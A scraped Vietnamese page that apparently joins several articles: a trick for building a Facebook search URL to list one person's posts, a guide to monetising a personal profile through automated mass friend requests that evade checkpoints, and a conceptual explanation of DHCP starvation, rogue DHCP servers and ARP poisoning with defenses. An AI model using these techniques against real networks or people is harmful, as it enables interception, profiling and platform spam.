Sau khi mã hóa bạn sẽ nhận được đoạn mã tương tự như: eyJycF9hdXRob3IiOiJ7XCJuYW1lXCI6XCJhdXRob3JcIixcImFyZ3NcIjpcIjEwMDAwOTE0MzE0NjM2NFwifSJ9

Bây giờ bạn cần xác định cụm từ mà bạn muốn tìm kiếm trong bài viết của người đó.

Chẳng hạn bạn muốn tìm tất cả bài viết có từ AnonyViet mà bạn của bạn đã đăng. Chúng ta thực hiện theo cú pháp như sau:

https://www.facebook.com/search/posts/?q=cụm-từ-cần-tìm-kiếm&epa=FILTERS&filters=đoạn-code-đã-mã-hóa-base64

Như vậy ta sẽ có link hoàn chỉnh là:

https://www.facebook.com/search/posts/?q=Anonyviet&epa=FILTERS&filters=eyJycF9hdXRob3IiOiJ7XCJuYW1lXCI6XCJhdXRob3JcIixcImFyZ3NcIjpcIjEwMDAwOTE0MzE0NjM2NFwifSJ9

Copy link trên vào trình duyệt và kết quả sẽ lọc tất cả bài viết mà bạn của bạn đã đăng trên Facebook.

Thật đơn giản để tìm tất cả bài viết của người khác trên Facebook phải không? Bằng cách này Facebook sẽ liệt kê chính xác bài viết và người viết cho bạn để dễ tìm kiếm hơn.

loading...

Biến trang cá nhân Facebook thành “Cỗ máy kiếm tiền”

0

Note: nội dung này hơi dài so với bình thường :/

========
Trang cá nhân Facebook là môi trường khá quen thuộc, hầu hết chúng ta đang sử dụng nó mỗi ngày với nhiều mục đích khác nhau. Mỗi ngày mạng xã hội có thể lấy đi 2-3h thời gian của chúng ta, nhưng không phải ai cũng biết cách khai thác nó để tạo ra #money, biến nó thành “cỗ máy kiếm tiền”. Hôm nay mình chia sẻ một vài kinh nghiệm bản thân để giúp ae chưa làm tốt có thể áp dụng tương tự…

1. NHỮNG QUAN ĐIỂM SAI LẦM VỀ KÊNH TIẾP CẬN NÀY

– “Đây không phải là kênh để phục vụ công việc kinh doanh, bán hàng. Muốn bán hàng hãy dùng Fanpage vì sẽ được Facebook hỗ trợ, kênh profile sẽ bị hạn chế”. Quan điểm này không hẵn đã đúng, tại sao chúng ta không chọn CẢ HAI?
– “Kênh tiếp cận này đã kém hiệu quả. Vì dần dần bị cạnh tranh, mất tương tác (reach)”. Điều này đang diễn ra với 95% những ai không có phương pháp, hãy cố gắng tìm ra BÍ QUYẾT cho riêng mình để trở thành top 5% những người khai thác tốt kênh tiếp cận này.
– “Là kênh tiếp cận khó mở rộng”. Điều này cũng đang diễn ra với hầu hết mọi người. Nhưng thực tế thông qua kênh này mình có thể tiếp cận >100.000 users mỗi tháng & đối tượng liên tục thay đổi (refresh), mang lại rất nhiều chuyển đổi cho công việc kinh doanh của mình.
– “Lâu có kết quả, phải nuôi vài tháng mới đạt kết quả”. (Mình nghĩ chỉ cần làm đúng thì chỉ sau vài ngày, có khoảng 500 bạn bè đúng tệp đã giúp ae có những khách hàng đầu tiên)
– “Công việc của tôi không phù hợp để áp dụng kênh này!” -> Mình cho rằng hầu hết mọi lĩnh vực đều có thể khai thác tốt nó cho công việc & sự nghiệp của mình, có điều bạn chưa thực sự thấy các hướng để áp dụng cho riêng mình mà thôi! (Ngoài yếu tố bán hàng, thì chúng ta còn sử dụng nó cho việc xây dựng nguồn lực, thương hiệu cá nhân, đối tác & duy trì các mqh chất lượng nữa)
– …

2. MỘT SỐ CASE STUDY ĐỂ GIÚP AE CÓ ĐỘNG LỰC ÁP DỤNG NÓ!

– Vũ Minh Hiếu – Founder Kidotaco: cậu em này có profile với >130.000 follow, và đây là môi trường giúp cậu ấy phát triển sự nghiệp & mqh rất tốt. Hiện nay THCN cậu ấy xây dựng mình cho rằng nó đáng giá triệu đô, nó sẽ còn giúp cậu ấy mở rộng các kênh tiếp cận khác & kiếm tiền tốt hơn trong tương lai
– Nguyễn Tùng Giang: anh ấy là một trong những case điển hình của việc khai thác rất tốt profile trên các group, là admin & chia sẻ đều đặn các post chất lượng. Mình tin chắc hoạt động này đã giúp a Giang phát triển công việc kinh doanh rất tốt!
– Nguyễn Hữu Lam – Co-founder Maxcos & nhiều dự án khác. Anh ấy có >104k follow & tạo ra rất nhiều giá trị cho cộng đồng. Thông qua kênh này cũng giúp anh ấy duy trì tương tác với học viên, đối tác, khách hàng của mình…
– Anh Lê Anh Tuấn – Founder/CEO A1 Digihub. Anh ấy rất chăm chỉ networking, sáng tạo nội dung chất lượng & xuất hiện ở nhiều cộng đồng. Các event anh ấy tổ chức thu hút nhiều members & khách hàng mua sản phẩm của A1. Mình nghĩ thông qua hình thức tiếp cận 0đ này đã giúp A1 phát triển thương hiệu & hoạt động kinh doanh rất tốt trong thời gian qua
– Phạm Linh – ATP Care. Cô ấy là một cộng sự của mình, mỗi tháng với các profile cô ấy xây dựng có thể tạo ra rất nhiều trial dùng sản phẩm & >100tr doanh số bán hàng từ kênh tiếp cận này.
– Hoàng Kim Ngọc (founder Laco – 154k follow), Long Vĩ Huỳnh (anh này chuyên bán Laptop kiếm trăm triệu mỗi tháng), Nguyễn Tất Kiểm (anh ấy quá nổi tiếng rồi chắc không cần giới thiệu),… những case tương tự này còn rất rất nhiều. Có hàng nghìn case study tương tự & tốt hơn ngoài kia. Họ vẫn đang kiếm hàng trăm triệu thậm chí hàng tỷ đồng mỗi tháng thông qua kênh tiếp cận này
– …

Vậy họ có BÍ MẬT gì mà chúng ta không biết chăng??? Hãy cùng đi phân tích & khám phá tiếp ở nội dung bên dưới…

3. NHỮNG LỢI ÍCH CỦA KÊNH TIẾP CẬN NÀY?

Để tăng thêm động lực & niềm tin giúp ae TỐI ƯU & ỨNG DỤNG trang cá nhân Facebook để phát triển sự nghiệp, công việc kinh doanh của mình. Mình sẽ phân tích thêm một vài lợi ích rõ rệt của kênh này…
– Đây là nơi dễ dàng giúp bạn KẾT NỐI bất kỳ ai, bất kỳ nhóm khác hàng mục tiêu nào trên Facebook
– Đây là CÔNG CỤ hữu hiệu bật nhất hiện nay giúp bạn XÂY DỰNG THƯƠNG HIỆU CÁ NHÂN (ngoài ra vẫn còn nhiều kênh khác như Youtube, Tiktok, Instagram, Blog, Fanpage,…). Nhưng lời khuyên của mình là hãy ƯU TIÊN làm tốt Facebook Profile trước, vì nó ĐƠN GIẢN hơn.
– Là kênh XÂY PHỄU cực tốt & biến một người lạ trở thành quen trên internet (tương tự phễu email hay chatbot fanpage, chuyển đổi từ trạng thái Lạnh -> Nóng -> Ấm)
– Là nơi xây dựng mối quan hệ, duy trì tương tác với bạn bè, đối tác hay khách hàng. Từ đó góp phần tạo ra các CƠ HỘI & phát triển SỰ NGHIỆP.
– Kênh tiếp cận này KHÔNG TỐN TIỀN & hoàn toàn có thể giúp bạn tiếp cận >100.000 users mỗi tháng
– Là kênh duy trì tương tác, cập nhật thông tin & chăm sóc chuyển đổi khá tối ưu chẳng kém gì các kênh bán hàng khác. Thậm chí nhiều nhiều lợi thế hơn vì không tốn kém chi phí…
– Là kênh QUEN THUỘC & bất kỳ ai cũng có thể nhanh chóng làm quen & ứng dụng
– …

4. CÁCH TỐI ƯU TRANG CÁ NHÂN: (quan trọng)
– Ảnh đại diện: siêu quan trọng! Cần một tấm hình chuẩn CHÂN DUNG & đủ chuyên nghiệp.
– Ảnh bìa: cần một ảnh thể hiện teamwork, công việc,… có text bổ sung càng tốt. Chú ý chuẩn kích thước trên mobile (vì 80% sẽ nhìn thấy nó trên mobile)
– Tiểu sử: nên cập nhật dòng trạng thái thể hiện quan điểm sống, giới thiệu về bạn hay công việc bạn làm, hoặc có thể một câu kêu gọi hành động. (Eg: “Inbox tôi để được tư vấn kinh doanh miễn phí”)
– Chi tiết thông tin: cập nhật đầy đủ những công việc đã & đang làm, càng chi tiết càng tốt. Cố gắng chèn thêm các liên kết từ website, channel, PR báo chí (nếu có),…
– Ảnh mô tả thêm: cập nhật 9 tấm ảnh bổ sung thể hiện công việc, gia đình, mối quan hệ,…
– …
Note: cố gắng chuyên nghiệp & thể hiện hình tượng chuyên gia. (Cũng tuỳ tính chất việc & phong cách mỗi người, nhưng cũng đừng quá “phông bạt” hay khoe khoang trên FB gây phản cảm)

5. CÁCH XÂY DỰNG TỆP DANH SÁCH BẠN BÈ CHẤT LƯỢNG: (quan trọng)

– Đây là hoạt động rất quan trọng giúp đạt kết quả thành công khi xây dựng nick Facebook
– Xác định rõ đối tượng khách hàng mình là ai?
– Định vị rõ nguồn lực bản thân để chọn tệp phù hợp giúp tạo tính tương tác cao. (Eg: giả sử mình thuộc 9x, nếu kết nối nhóm chủ doanh nghiệp & chia sẻ kiến thức về kinh doanh. Rất khó nhận lại sự quan tâm & follow của những anh chị 8x, 7x. Vậy mình cần target nhóm nhỏ tuổi hơn mình. Hoặc ngược giới tính sẽ dễ có tương tác tốt hơn. Ví dụ như case của Vũ Minh Hiếu, Nguyễn Tất Kiểm tệp users đa số là nữ có tương tác rất tốt)
– Xác định khách hàng tiềm năng ở đâu? (Từ post bất kỳ, group, page hay friends của ai đó). Từ đó gửi yêu cầu kết bạn
– CHỦ ĐỘNG gửi kết bạn ĐỀU ĐẶN để nhận lại các lượt chấp nhận thành bạn bè của nhau (thường tỷ lệ sẽ ~20-30%). Quá trình này có thể làm thủ công bằng tay hoặc tool đều được
– Làm đều đặn đến khi có full 5000 bạn bè (thường sẽ mất 1-3 tháng)
– …

Rào cản:
– Full 1000 requests không gửi tiếp được (nên hầu hết các nick dừng ở ~1000 bạn nếu không biết cách, chờ rất lâu mới full 5000 bạn)
– Huỷ & lọc tương tác khó khăn
– Việc kết bạn mất nhiều thời gian
– Khó target chính xác nhóm đối tượng muốn nhắm đến
– Khó làm song song 2-3 nick tối ưu
– …
=> Tất cả các rào cản đó sẽ dễ dàng giải quyết được khi ứng dụng công cụ Simple Facebook, Simple Account

6. CÔNG THỨC ĐỂ CÓ 2-3 NICK FULL 5000 BẠN BÈ SAU 2-3 THÁNG

– Xây chuẩn info trang cá nhân
– Quét tệp khách hàng cần kết bạn
– Chia file, gửi kết bạn tự động 500-1000 lượt/ngày (làm đều đặn)
– Huỷ các lượt đã gửi kết bạn khi bị full 1000 & tiếp tục lặp lại với tệp mới
– Làm đều đặn đến khi full 5000 bạn
– …

Lưu ý:
– Để tránh checkpoint, cần kết bạn với nhóm có ít nhất 1 bạn chung (tỷ lệ càng nhiều bạn chung càng tốt)
– Tránh lạm dụng quá nhiều nick đồng thời (lời khuyên chỉ nên khai thác 2-3 nick để đảm bảo hiệu quả & khả năng chăm sóc tối ưu)
– …

7. CHIẾN LƯỢC XÂY DỰNG NỘI DUNG:

– Cập nhật status đều đặn mỗi ngày
– Tầng suất hợp lý, nên 1-3 post/ngày, hoặc 2 ngày/lần. Đừng để tường mình “đóng rêu” là được.
– Đăng vào khung giờ vàng có users online đông
– Đăng các nội dung GIÁ TRỊ (chia sẻ trải nghiệm, đúc kết, kiến thức, quan điểm, thông tin giá trị,…). Đừng quá cố gắng bán hàng…
– “TINH TẾ” chèn vào các nội dung BÁN HÀNG hợp lý, nhưng cũng đừng quá lạm dụng. Nên trao giá trị đủ lớn để nhận được sự ủng hộ thay vì cố gắng ép friends mua sản phẩm của mình
– Show những thông tin về công việc & sản phẩm + kèm các giá trị gì đó. Để friends biết bạn đang làm gì??? -> Khi phát sinh nhu cầu tự ắc sẽ liên hệ hay giới thiệu khách hàng cho bạn
– Nếu các post dài thì nên có TIÊU ĐỀ & VIẾT HOA tiêu đề đó, cần một tiêu đề đủ thu hút
– Xen kẽ nhiều loại nội dung khác nhau, độ ngắn dài khác nhau
– Nên chèn ảnh cá nhân vào các status (một cách rất tốt để có reach & xây dựng nhận diện thương hiệu cá nhân)
– Có CHẤT RIÊNG (hạn chế copy hay giống profile của một ai khác)
– Nếu có kỹ năng nói tốt, hãy livestream để tương tác với users & bán hàng trên các livestream đó
– …

8. CHIẾN LƯỢC XÂY DỰNG TƯƠNG TÁC CAO & VIRAL NỘI DUNG:

– Đặt câu hỏi, các post thảo luận
– Tương tác với bạn bè để nhận được phản hồi ngược lại (có thể thủ công hoặc tool)
– Đăng post “lọc tương tác” & thực hiện việc lọc tương tác ở những thời điểm có reach thấp
– Quan sát & mô phỏng các nội dung khác có reach tốt để làm được điều tương tự
– Đăng các nội dung theo trend, gây tranh cãi, hài hước,… (loại nội dung này sẽ giúp có reach rất tốt)
– Chia sẻ thông tin thực sự giá trị & khác biệt
– Tặng quà, tặng tài liệu, tặng khoá học, tặng phần mềm MIỄN PHÍ (nếu có)
– Tham gia các GROUP về chủ đề bạn chia sẻ & đăng bài viết tại đó (rất quan trọng, quá trình này sẽ thu hút thêm rất nhiều follow)
– Cố gắng chèn THƯƠNG HIỆU hoặc domain website vào hình ảnh. “Tinh tế” để tránh phản cảm, điều này sẽ giúp thương hiệu của bạn có nhận diện rất tốt
– Bài viết CHẤT tự ắc sẽ được viral. Tức users sẽ chia sẻ chúng hoặc copy đăng tải lại. Một số page/group lớn các admin cũng có thể đăng lại post của bạn
– Chia sẻ VIDEO VIRAL (loại video giải trí hay mang tính thời sự có hàng triệu lượt view). Cái này phù hợp với đăng trên fanpage hơn, nhưng profile cũng có thể áp dụng
– Nếu có thể, chủ động liên hệ các page cùng chủ đề để đề xuất nội dung cho admin đăng tải lại (cách này giúp chuyển đổi tốt hơn thay vì chờ đợi)
– Call action phù hợp để có nhiều lượt thảo luận, lượt share
– …

=> LÀM TỐT. Mỗi nội dung chất lượng, có thể tiếp cận 100.000 reach. Bản thân mình & ATPTeam đã có khá nhiều case như vậy. Con số này thực tế không khó, chỉ cần 1 nội dung đăng tốt trên profile & 10-20 groups chất lượng thì sẽ có lượt reach đó thôi. (Mình hi vọng post này đạt được KPi trên)

9. CHIẾN LƯỢC KHAI THÁC GROUP:

– Xây dựng 1-3 group riêng theo ngách chủ đề mình muốn phát triển. Chủ động add thành viên & xây dựng nội dung hữu ích để thu hút thành viên mới tham gia (là admin ae sẽ có rất nhiều lợi thế)
– Tham gia đều đặn 5-10 groups khác mỗi ngày, các nhóm có reach tốt & được kiểm duyệt (tạo danh sách nhóm chất & đăng bài thường xuyên ở đó)
– Tạo thiện cảm & mqh tốt với các admin khác. Chia sẻ nội dung hữu ích tại đó! (Đừng bán hàng mà chỉ tập trung sharing những gì hữu ích nhất)
– Mỗi ngày đặt 3-5 post phù hợp trên các group khác nhau. Khai thác lại content cũ trước đó (chú ý đừng copy 100% sẽ bị giảm reach, vì thế hãy edit tiêu đề, hình ảnh & một chút nội dung để phù hợp)
– …

10. HIỂU HÀNH VI USERS CẦN GÌ TRÊN FACEBOOK CÁ NHÂN:

– Users muốn theo dõi chuyên gia, những ai thường xuyên chia sẻ các thông tin có giá trị
– Tham gia các group & theo dõi topic mà họ quan tâm (các chủ đề quan tâm có thể thay đổi theo thời gian)
– Users cần tính tương tác qua lại, tức sẽ “vui hơn” nếu bạn phản hồi các comment & tương tác ngược lại với các post của họ
– Users tin tưởng một profile THẬT & có đầy đủ thông tin (công việc, thông tin khác, hình ảnh, gia đình,…)
– Nhóm nam sẽ thích tương tác với nữ & ngược lại. Cũng tuỳ nhưng nhóm #ninja thường là nam & high level. Càng kết nối người giỏi càng khó nhận sự tương tác ngược lại. Kk
– …

HÀNH VI MUA HÀNG TRÊN FACEBOOK CÁ NHÂN:
– Muốn sự chủ động, không bị chèn ép hay chào mời mua hàng
– Muốn mua hàng giá rẻ hơn khi tiếp cận trực tiếp người bán trên trang cá nhân
– Muốn sự support tận tình thông qua chính kênh bán hàng này từ người bán (được tư vấn)
– Thông qua kênh này, khách hàng có quá trình quan sát & tin tưởng để ra quyết định mua hàng cao hơn
– Là kênh chăm sóc & tương tác sau bán hàng
– …

11. HIỂU THUẬT TOÁN CỦA FACEBOOK VỚI TRANG CÁ NHÂN:

– AI Facebook nhận ra post sao chép, do đó các nội dung trùng lặp đăng tải lại sẽ kém reach (nếu sử dụng trùng nội dung, hãy edit tiêu đề, ảnh,…)
– Những bạn bè mới kết nối sẽ có tương tác tốt hơn (tức nhìn thấy post của nhau trên newfeed, điều này có lợi nếu bạn chăm chỉ lọc bạn & kết nối friends mới)
– Facebook ưu tiên hiển thị post với những users có hành vi tương tác gần đây với bạn (nếu họ không tương tác 5-10 lần các post gần đây, thì dần dần sẽ mất kết nối nhau trên newfeed)
– Các post có tương tác tốt, sẽ có xu hướng viral thêm nhóm bạn của bạn (hoặc nhóm có bạn chung nhất định)
– Lượt share giai đoạn gần đây đã bị giảm reach khá nhiều
– Thỉnh thoảng Facebook bóp reach hoặc update gì đó nên có thể bị giảm tương tác vài ngày. Đừng quá lo lắng!
– Nick mới sẽ dễ bị checkpoint giai đoạn đầu. Nick lâu năm sẽ trust hơn. Kết bạn với nhóm có bạn chung cao sẽ tránh được check thay vì nhóm bạn xa lạ
– Mỗi ngày chúng ta hoàn toàn có thể gửi cả nghìn requests mà chẳng vấn đề gì cả. Nhưng đừng làm với tốc độ quá nhanh có thể bị block tính năng tạm thời
– ĐỪNG SPAM & lạm dụng tính năng nào đó quá đáng!
– Chúng ta có thể add bạn bè thủ công hoặc bằng tool vào nhóm 200-300 lượt/ngày (làm “quá tay” có thể bị block 1 tuần)
– Mời bạn bè like fanpage cũng tương tự mà chẳng sợ block hay ảnh hưởng gì
– …

12. NHỮNG RÀO CẢN CẦN VƯỢT QUA KHI ÁP DỤNG!

– Sự lười biếng, muốn có kết quả nhanh!
– Sự tự ti, ngại ngùng, sợ người khác đánh giá
– Rào cản về tri thức, trải nghiệm & kỹ năng viết/video. Thực tế nếu không RÈN LUYỆN & chấp nhận sự thiếu xót của bản thân để hoàn thiện, thì bạn chẳng bao giờ tiến bộ được!
– Không dám THỂ HIỆN BẢN THÂN, show những trải nghiệm, đúc kết lên mạng xã hội
– Tốn thời gian sản xuất nội dung chất lượng. (Bạn có sẵn sàng bỏ ra 3-4h tương tự mình làm với bài viết này để có thể tiếp cận >100.000 users?)
– Chán nản & lười nhác khi không có kết quả. Đây là hoạt động cần sự “TINH TẾ” & “TỈ MỈ”, đặt TÂM HUYẾT rất nhiều vào hoạt động này mới mong có kết quả
– Chăm chỉ lọc tệp bạn bè, tìm kiếm nhóm chất & sharing thương xuyên trên đó
– …

12. MỤC TIÊU VỀ CÁC CON SỐ:

– 500-1000 requests mỗi ngày
– Lọc & làm mới tệp bạn bè sau 1-2 tháng
– Có 2-3 nick full bạn & có thêm càng nhiều follow càng tốt
– Cố gắng tiếp cận >100.000 reach mỗi tháng để có kết quả đủ tốt
– Cố gắng tạo ra 10-20 leads mỗi ngày từ kênh bán hàng này
– Chăm chuyển đổi để có 1-3 khách hàng/ngày. Quản lý trạng thái & chăm sóc lại tốt khách hàng tốt hơn bởi phần mềm CRM_Profile
– Mỗi post nên có >100 like, nếu dưới con số này cố gắng cải thiện reach bằng việc lọc lại tệp & cải thiện nội dung
– Tìm sản phẩm/dịch vụ để tạo ra kết quả ổn. Khai thác kênh bán hàng này để tạo ra hàng chục triệu, thậm chí hàng trăm triệu mỗi tháng mà không phụ thuộc vào ads
– …

13. KEYS NHẤN MẠNH & TỔNG KẾT NỘI DUNG:

– Kênh tiếp cận này có thể giúp bạn kiếm trăm triệu mỗi tháng
– TỆP BẠN BÈ rất quan trọng
– Chủ động gửi kết bạn đúng tệp đều đặn để có 5000 bạn bè đầu tiên
– Content chất & xuất hiện được nhiều tại các groups khác
– Đừng cố gắng bán hàng, hãy nỗ lực tạo ra giá trị lớn
– Hãy bắt đầu NGAY & đừng cầu toàn
– Liên tục làm mới bản thân & friend list để có tương tác tốt hơn
– Mở rộng với các kênh khác để tăng nhận diện & sự chuyển đổi
– Ae cần một MHKD & Sản Phẩm có biên lợi nhuận đủ tốt để có chuyển đổi tốt. Từ đó kênh tiếp cận này mới phát huy tốt sức mạnh được!
– …

ĐẶT BIỆT: với những ae đã làm tốt hoạt động này, nắm vững KỸ NĂNG & từ đó SCALE đào tạo/hướng dẫn cho đội nhóm cùng làm được kết quả tương tự mình. Từ đó nhân bản kết quả kinh doanh & có thể kiếm tiền tỷ mỗi tháng… @@
Mỗi doanh nghiệp, đội sales, thậm chí marketers cũng nên ứng dụng kênh này để có TÀI NGUYÊN CHỦ ĐỘNG, giúp công phát triển triển tốt.

Nội dung này đáng giá một khoá học ~200-500k nếu ae cảm nhận tốt & sự tin tưởng để action nó. Thông qua việc truyền tải bằng text sẽ có nhiều hạn chế, khó truyền tải hết các ý mong ae khi đọc thông cảm! Và nội dung là đúc kết & sharing của cá nhân cho 1 kênh tiếp cận, do đó nếu so với các kênh khác sẽ có những ưu/nhược điểm nhất định. Mình vẫn khuyến khích mọi người áp dụng ĐA KÊNH nếu có thêm nguồn lực…

loading...

Series Sniffing – Phần 3 : Tổng quan về sniffing

0

TẤN CÔNG DHCP

Khái niệm DHCP và qua trình cấp phát IP động

DHCP (Dynamic Host Configuration Protocol – giao thức cấu hình host động) là một giao thức cho phép cấp phát địa chỉ IP một cách tự động cùng với các cấu hình liên quan khác như subnet mark và gateway mặc định.

Quá trình truyền thông giữa một máy tính trạm được cấu hình sử dụng IP động (DHCP Client) với một máy đảm nhận chức năng cấp phát IP động (DHCP Server) diễn ra như sau:

  • Đầu tiên, một DHCP Client muốn nhận mới một địa chỉ IP sẽ gửi lên toàn mạng (broadcast) một thông điệp “DHCP Discover” có chứa địa chỉ MAC của nó để tìm kiếm sự hiện diện của DHCP server.
  • Sau đó, nếu có DHCP Server thuộc cùng subnet với DHCP Client trên server này sẽ phản hồi lại cho client bằng một thông điệp “DHCP Offer” có chứa một địa chỉ IP như là một lời đề nghị cho “thuê” (lease) địa chỉ.
  • Tiếp theo, khi nhận được gói “DHCP Offer” đến đầu tiên, client sẽ trả lời lại cho server một thông điệp “DHCP Request” như là sự chấp thuận lời đề nghị.
  • Cuối cùng, server gửi lại cho client thông điệp “DHCP Acknowledgment” để xác nhận lần cuối với client. Và từ đây client có thể sử dụng địa chỉ IP vừa “thuê” được để truyền thông với các máy khác trên mạng.
Quá trình cấp phát IP từ máy chủ DHCP

Tuy có nhiều ưu điểm, nhưng giao thức DHCP lại hoạt động khá đơn giản, suốt quá trình trao đổi thông điệp giữa DHCP Server và DHCP Client không có sự xác thực hay kiểm soát truy cập nên dễ phát sinh một số điểm yếu về an toàn. DHCP Server không thể biết được rằng mình đang liên lạc với một DHCP Client bất hợp pháp hay không, ngược lại DHCP Client cũng không thể biết DHCP Server đang liên lạc có hợp pháp không. Trong mạng có khả năng xuất hiện các DHCP Client giả và DHCP Server giả.

DHCP Client giả

Trong trường hợp này, DHCP Client là một máy trạm bất hợp pháp. Attacker có thể thoả hiệp thành công với một client hợp pháp nào đó trong mạng, sau đó thực hiện các chương trình cài đặt. Các chương trình thực thi trên client này thực hiện “vét cạn”, liên tục gửi tới DHCP Server các gói tin yêu cầu xin cấp IP với các địa chỉ MAC không có thực, cho tới khi dải IP có sẵn trên DHCP Server cạn kiệt vì bị thuê hết. Điều này dẫn tới việc DHCP Server không còn địa chỉ IP nào để cho các DHCP Client hợp pháp thuê, khiến dịch vụ bị ngưng trệ, các máy trạm khác không thể truy nhập vào hệ thống mạng để truyền thông với các máy tính trong mạng.

Attacker thực hiện “vét cạn” khiến giải địa chỉ IP có trên DHCP Server bị cạn kiệt.

DHCP Server giả

Kẻ tấn công sẽ tạo ra môt server giả mạo vào trong mạng. Server này có khả năng phản hồi DHCP discovery request từ phía client. Vậy nên cả server giả mạo và server thực đều có khả năng phản hồi các yêu cầu của client và server nào đáp ứng trước sẽ kiểm soát được client đó. DHCP server giả mạo có thể gán địa chỉ IP của mình thành default gateway cho client. Như vậy, tất cả các thông tin từ client sẽ được gửi tới địa chỉ của kẻ tấn công. Kẻ tấn công sau khi thu thập tất cả những thông tin này, rồi chuyển đến default gateway đúng của mạng. Vì thế client vẫn truyền bình thường với các máy ngoài mạng mà không hề biết họ đã để lộ thông tin cho kẻ tấn công. Loại tấn công này rất khó bị phải hiện bởi client trong một thời gian dài.

Hoạt động của DHCP Server giả mạo

Nguy hiểm hơn, nếu kẻ tấn công phá vỡ được các hàng rào bảo vệ mạng và đoạt được quyền kiểm soát DHCP Server thì có thể tạo ra những thay đổi trong cấu hình của DHCP Server theo ý muốn. Khi đó, kẻ tấn công có thể thiết lập lại dải IP, subnet mask,… của hệ thống để các máy trạm hợp pháp không thể đăng nhập vào hệ thống mạng được, tạo ra tình trạng từ chối dịch vụ trong mạng hay làm những việc gây ảnh hưởng xấu đến toàn hệ thống mạng.

Các biện pháp phòng chống

Kẻ tấn công đã dùng phương pháp “vét cạn”, liên tục gửi tới DHCP Server các gói tin yêu cầu xin cấp IP với các địa chỉ MAC không có thực, cho tới khi dải IP có sẵn trên DHCP Server cạn kiệt vì bị thuê hết. Vì thế cần phải có biện pháp ngăn chặn việc này như:

  • Xây dựng một bảng chứa thông tin liên quan giữa: địa chỉ MAC máy client-địa chỉ IP – VLAN – số hiệu cổng. Bảng này dùng để giám sát việc xin cấp phát địa chỉ IP của các máy client, tránh việc 1 máy client xin cấp phát nhiều địa chỉ IP.
  • Quy định số lượng gói tin DHCP đến 1 cổng/đơn vị thời gian.

Ngoài ra có thể sử dụng một số giải pháp của các hãng công nghệ. Hãng Cisco đã đưa công nghệ DHCP snooping (giám sát DHCP) vào thiết bị switch. Ý tưởng chính của công nghệ này là:

Cấu hình các cổng trên switch thành 2 kiểu: cổng trust và cổng untrust.

Cổng trust là cổng có thể cho phép gửi đi tất cả các loại các bản tin, được nối với máy chủ DHCP.

Cổng untrust là cổng chỉ có thể gửi đi bản tin xin cấp phát địa chỉ IP. Cổng untrust thường là cổng nối với các thiết bị đầu cuối người dùng. Do vậy máy tính của kẻ tấn công mặc dù là một máy chủ DHCP, nhưng không thể gửi các bản tin DHCP cấp phát địa chỉ IP giả mạo.

Chặn bắt thông tin dùng ARP- Poisoning

Khái niệm và nguyên tắc làm việc của ARP trong mạng LAN

Tầng Network của mô hình OSI sử dụng các loại địa chỉ mang tính chất quy ước như IP, IPX… Trên thực tế, các card mạng (NIC) chỉ có thể kết nối với nhau theo địa chỉ MAC, địa chỉ cố định và duy nhất của phần cứng. Chính vì vậy, giao thức phân giải địa chỉ: Address Resolution Protocol (ARP)  được sử dụng để chuyển đổi các dạng địa chỉ này qua lại với nhau.

Khi một thiết bị mạng muốn biết địa chỉ MAC của một thiết bị mạng nào đó mà nó đã biết địa chỉ ở tầng network (IP, IPX…) nó sẽ gửi một ARP request bao gồm địa chỉ MAC address của nó và địa chỉ IP của thiết bị mà nó cần biết MAC address trên toàn bộ một miền broadcast. Mỗi một thiết bị nhận được request này sẽ so sánh địa chỉ IP trong request với địa chỉ tầng network của mình. Nếu trùng địa chỉ thì thiết bị đó phải gửi ngược lại một ARP reply cho thiết bị gửi ARP request (trong đó có chứa địa chỉ MAC của mình).

Lấy ví dụ trong một hệ thống mạng đơn giản, khi PC A muốn gửi gói tin đến PC B và nó chỉ biết được địa chỉ IP của PC B. Khi đó PC A sẽ phải gửi một ARP request broadcast cho toàn mạng để hỏi xem “địa chỉ MAC của PC có địa chỉ IP này là gì?”. Khi PC B nhận được broadcast này, nó sẽ so sánh địa chỉ IP trong gói tin này với địa chỉ IP của nó. Nhận thấy đó là địa chỉ IP của mình, PC B sẽ gửi lại một gói tin ARP reply cho PC A, trong đó có chứa địa chỉ MAC của B. Sau đó PC A mới bắt đầu truyền gói tin cho B.

Cách thức hoạt động của ARP

ARP là một giao thức phi trạng thái. Máy chủ mạng sẽ tự động lưu trữ bất kỳ ARP reply nào mà chúng nhận được, bất kể máy khác có yêu cầu hay không. Ngay cả các mục ARP chưa hết hạn sẽ bị ghi đè khi nhận được gói tin ARP reply mới. Không có phương pháp nào trong giao thức ARP mà giúp một máy có thể xác nhận máy mà từ đó gói tin bắt nguồn. Hành vi này là lỗ hổng cho phép ARP spoofing xảy ra.

Cách thức hoạt động của ARP Poisoning

Giao thức ARP vốn được thiết kế ra nhằm mục đích tạo tính thuận tiện để trao đổi địa chỉ giữa lớp thứ 2 và lớp thứ 3 của mô hình OSI. Lớp thứ hai, hay còn gọi với cái tên khác là tầng data-link, sử dụng địa chỉ MAC để các thiết bị phần cứng thể giao tiếp với nhau một cách trực tiếp trong một diện nhỏ. Còn với lớp thứ 3, tên khác là tầng network, thì lại sử dụng địa chỉ IP để tạo ra một mạng với diện rộng hơn để có thể giao tiếp trên toàn cầu.

Tổ chức của giao thức ARP vốn xoay quanh hai gói tin chính, đó là ARP request và ARP reply. Mục đích chính của gói tin request và reply là để định vị được địa chỉ MAC của thiết bị phần cứng tương ứng với địa chỉ IP mà nó được gán cho. Từ đó, các luồng dữ liệu mới có thể được truyền đi tới đích trong một mạng mà không bị thất lạc hay nhầm lẫn máy tính khác không yêu cầu gói tin đó.

Để hiểu được tính chất request và reply, ta hình dung đơn giản như sau. Gói request sẽ được gửi đi cho từng thiết bị trong mạng và phát đi thông điệp “Xin chào, địa chỉ IP của tôi là X.X.X.X, và địa chỉ MAC của tôi là X:X:X:X:X:X. Tôi cần gửi một thứ đến một máy có địa chỉ IP là Y.Y.Y.Y, nhưng tiếc thay tôi không có địa chỉ MAC của anh ấy. Vậy ai có địa chỉ IP như tôi vừa nói thì vui lòng phản hồi kèm theo địa chỉ MAC của anh để tôi trao gói tin này.”

Lúc này, máy cần phản hồi sẽ đưa ra gói ARP reply với thông điệp “Tôi là người anh cần tìm đây. Tôi có địa chỉ IP là Y.Y.Y.Y và MAC của tôi là Y:Y:Y:Y:Y:Y”. Khi quá trình truyền giao gói tin hoàn tất, thiết bị phát sẽ cập nhật bảng ARP cache của nó và hai thiết bị này có thể truyền thông với nhau.

